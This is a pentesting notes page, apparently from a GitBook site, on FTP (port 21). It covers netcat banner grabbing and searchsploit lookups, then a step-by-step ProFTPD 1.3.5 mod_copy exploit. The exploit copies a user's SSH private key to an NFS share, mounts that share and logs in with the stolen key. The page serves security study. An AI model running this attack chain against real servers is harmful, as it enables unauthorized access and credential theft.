Defender's Notes
  • Welcome!
  • Methodology
  • Ethical Hacking
  • Resources/Blogs/Conferences/Labs
  • Writing Vulnerability Reports
  • Linux Tips
  • Certifications
  • Bug Bounty
    • Hints
  • Python
  • PenTesting
    • Recon
    • Network Scanning
    • Reverse Shell Payloads
    • API Security Testing
    • 53 - DNS
    • 21 - ftp
    • 139,445 - SMB
    • 111,2049 - rcpbind
    • Authentication
    • Scripting
    • OSINT
    • Cloud Security
    • Reverse Engineering
    • Password
    • Proxy Chain
    • Steganography
    • Buffer Overflow
  • Windows
    • Recon
    • Golden/Silver Ticket
    • PowerShell for Beginners
    • Windows Priv Escalate
      • Icecast (RPC)
    • Kerberos Attack
  • Web Pentesting
    • 80,443,8080 - Recon
    • Resources
      • Burp Suite
    • Web Vulnerabilities
      • WordPress
      • CSP Bypass
      • JSON Web Tokens
      • Insecure Desensitization
      • Open Redirect
      • Command Injection
      • Path Traversals
      • SSRF
      • SQL Injection
      • IDOR
      • Shellshock
      • Heartbleed
      • Session Attacks/Bypass
      • XSS
      • XXE
      • CSRF
      • File Inclusion (Local/Remote)
      • Drupal
    • OWASP Top 10 2017
      • Top 1: Injection
      • Top 2: Broken Authentication
      • Top 3: Sensitive Data Exposure
      • Top 4: XML External Entities (XXE)
      • Top 5: Broken Access Control
      • Top 6: Security Misconfiguration
      • Top 7: Cross-Site Scripting (XSS)
      • Top 8: Insecure Deserialization
      • Top 9: Using Components with Known Vulnerabilities
      • Top 10: Insufficient Logging & Monitoring
    • OOB
    • Java
    • Python Web Security
  • Linux
    • Upgrading shell
    • Linux Priv Escalate
      • Path Variable Manipulation
      • Systemctl
  • Binary Security
    • AOT
  • Hardware Security
    • Wi-fi
    • Radio
  • Mobile Security
    • Android
    • SMS
  • Videos
    • IppSec Videos
    • The Cyber Mentor
Powered by GitBook
On this page
  • Enumeration
  • Exploitation examples
  • ProFTPD 1.3.5 mod_copy

Was this helpful?

  1. PenTesting

21 - ftp

Enumeration

Use netcat to banner grab FTP version

nc $IP 21

Use searchsploit to find exploits from exploit-db on FTP version

searchsploit ftp 1.2.3

Exploitation examples

ProFTPD 1.3.5 mod_copy

ProFTPD 1.3.5 has a vulnerability within mod_copy module, which allows to use SITE CPFR and SITE CPTO commands commands via netcat to copy files. Within this example we will chain this exploit to copy Bobo's SSH keys to a misconfigured NFS share, then mount the share on our attack machine allowing access to the SSH keys.

# Use netcat to copy the file into a NFS share(s)
nc $IP 21
# 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [<IP>]
SITE CPFR /home/bob/.ssh/id_rsa
# 350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
# 250 Copy sucessful

# Mount the nfs share and get bob's keys
mkdir nfs
sudo mount $IP:/var nfs
cp nfs/tmp/id_rsa id_rsa
sudo umount nfs

# Use SSH to log into a host
chmod 600 id_rsa
ssh -i id_rsa bob@$IP
Previous53 - DNSNext139,445 - SMB

Last updated 4 years ago

Was this helpful?